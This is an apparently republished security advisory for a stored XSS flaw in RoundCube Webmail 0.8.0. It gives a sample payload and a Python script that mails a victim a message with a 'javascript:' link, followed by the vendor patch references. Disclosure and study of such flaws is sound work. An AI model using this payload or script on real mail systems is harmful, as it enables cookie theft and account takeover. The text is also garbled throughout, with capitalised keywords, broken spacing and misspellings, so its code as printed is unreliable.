RoundCube Webmail 'href 'body HTML Injection Vulnerability

Source: Internet
Author: User
Tags imap roundcube roundcube webmail

Release date:
Updated on:

Affected Systems:
RoundCube Webmail 0.X
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55051

RoundCube Webmail is a browser-based IMAP client.

RoundCube Webmail 0.8.0 and other versions have multiple HTML Injection Vulnerabilities. If the input passed through the "href" HTML attribute is incorrectly filtered, it will be used, attackers can inject HTML and script code into the affected browsers to steal Cookie authentication creden。 or control the appearance of the site.

<* Source: Shai rod
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Shai rod () provides the following test methods:


#! /Usr/bin/python

'''
# Exploit Title: Roundcube Webmail Stored XSS.
# Date: 14/08/2012
# Exploit Author: Shai rod (@ NightRang3r)
# Vendorhomepage: http://roundcube.net
# Software Link: http://sourceforge.net/projects/roundcubemail/files/roundcubemail/0.8.0/roundcubemail-0.8.0.tar.gz/download
# Version: 0.8.0


# Gr33Tz: @ aviadgolan, @ benhayak, @ nirgoldshlager, @ roni_bachar

# Timeline:
#14 Aug 2012: Discovered Vulnerability.
#14 Aug 2012: Opened Ticket #1488613-http://trac.roundcube.net/ticket/1488613
#15 Aug 2012: Fix added to repo.

Https://github.com/roundcube/roundcubemail/commit/c086978f6a91eacb339fd2976202fca9dad2ef32
Https://github.com/roundcube/roundcubemail/commit/5ef8e4ad9d3ee8689d2b83750aa65395b7cd59ee


About the Application:
======================================

Roundcube is a free and open source webmail solution with a desktop-like user interface which is easy to install/configure and that runs on a standard LAMPP
Server. The skins use the latest web standards such as XHTML and CSS 2. Roundcube has des other sophisticated open-source libraries such as PEAR,
An IMAP library derived from IlohaMail the TinyMCE rich text editor, Googiespell library for spell checking or the WasHTML sanitizer by Frederic Motte.

Vulnerability Description
======================================

1. Stored XSS in e-mail body.

XSS Payload: <a href = javascript: alert ("XSS")> poc mail </a>

Send an email to the victim with the payload in the email body, Once the user clicks on the url the XSS shocould be triggered.

2. Self XSS in e-mail body (Signature ).

XSS Payload: ">

In order to trigger this XSS you shoshould insert the payload into your signature.

Settings-> Identities-> Your Identitiy-> Signature
Now create a new mail, XSS shoshould be triggered.

'''

Import smtplib

Print "###################################### #########"
Print "# Roundcube 0.8.0 Stored xss poc #"
Print "# Coded by: Shai rod #"
Print "# @ maid #"
Print "# http://exploit.co.il #"
Print "# For Educational Purposes Only! #"
Print "###################################### ######### \ r \ n"

# SETTINGS

Sender = "attacker @ localhost"
Smtp_login = sender
Smtp_password = "qwe123"
Recipient = "victim @ localhost"
Smtp_server = "192.168.1.10"
Smtp_port = 25
Subject = "Roundcube Webmail xss poc"


# SEND E-MAIL

Print "[*] Sending E-mail to" + recipient + "..."
Msg = ("From: % s \ r \ nTo: % s \ r \ nSubject: % s \ n"
% (Sender, ",". join (recipient), subject ))
Msg + = "Content-type: text/html \ n"
Msg + = "<a href = javascript: alert (" XSS ")> Click Me, Please... </a> \ r \ n """
Server = smtplib. SMTP (smtp_server, smtp_port)
Server. ehlo ()
Server. starttls ()
Server. login (smtp_login, smtp_password)
Server. sendmail (sender, recipient, msg)
Server. quit ()
Print "[+] E-mail sent! "

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

RoundCube
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://roundcube.net/

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.